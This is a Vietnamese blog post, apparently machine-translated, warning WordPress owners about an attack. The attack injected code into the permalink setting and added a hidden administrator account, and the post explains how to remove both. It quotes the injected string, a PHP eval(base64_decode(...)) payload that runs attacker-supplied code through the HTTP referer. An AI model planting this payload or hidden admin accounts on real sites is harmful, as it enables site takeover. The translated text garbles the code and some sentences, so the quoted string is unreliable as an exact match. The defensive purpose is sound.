Một cuộc tấn công SQL gần đây đánh vào nhiều trang web nơi mã được đưa vào trang web của bạn. Việc tiêm MySQL này ảnh hưởng đến permalinks của bạn làm cho chúng không hiệu quả. Do đó, các URL của bài đăng trên blog của bạn sẽ không hoạt động. Nhiều blog WordPress đã bị tấn công trong cuộc tấn công này, cảm ơn Andy Soward vì đã thu hút sự chú ý của chúng tôi.
Có một trong những mã sau đây đã được thêm vào cấu trúc permalink của bạn do cuộc tấn công này:
% & ({$ {eval (base64_decode ($ _ SERVER (HTTP_REFERER)))}} |. +) &%
"/% & (% 7B$
Các trích dẫn này bao gồm tất cả các permalinks trên trang web của bạn và chỉ có thể được thay đổi nếu chúng được xóa bằng tay.
Để khắc phục điều này, hãy đi tới:
Cài đặt> Permalinks và xóa mã ở trên và thay thế mã mặc định của bạn.
Điều tiếp theo cần làm là vào Người dùng. Bạn sẽ thấy rằng có nhiều hơn một quản trị viên. Bạn sẽ không thấy tên mình trong danh sách, nhưng bạn sẽ thấy số lượng tăng lên. Vì vậy, những gì bạn nên làm là nhìn vào tất cả người dùng và tìm người cuối cùng đã đăng ký. Di chuột qua người dùng đó và nhận được liên kết. Thay đổi userid = code bằng cách thêm 1 đến con số đó Vì vậy, nếu người dùng cuối cùng bạn có thể thấy là người dùng # 2thêm 1 và làm điều đó 3. Bạn nên thấy rằng quản trị viên ẩn có mã lạ là tên đầu tiên. Xóa mã và làm cho nó trở thành một thuê bao. Sau đó quay lại và xóa nó.
Điều này sẽ khắc phục vấn đề. Bạn cũng có thể xóa nó một cách đơn giản bằng cách truy cập PHPMyAdmin của bạn. Bởi vì bạn sẽ thấy người dùng ở đó.
Chúng tôi chỉ muốn đưa tin tức này ra càng sớm càng tốt, để người dùng của chúng tôi có thể cập nhật. Hãy chắc chắn kiểm tra xem blog của bạn không bị nhiễm bệnh. Chúng tôi hy vọng WordPress sẽ sớm ra mắt.
Ngoài ra, nếu bạn chưa thực hiện một số biện pháp này để bảo vệ khu vực quản trị WordPress của mình.
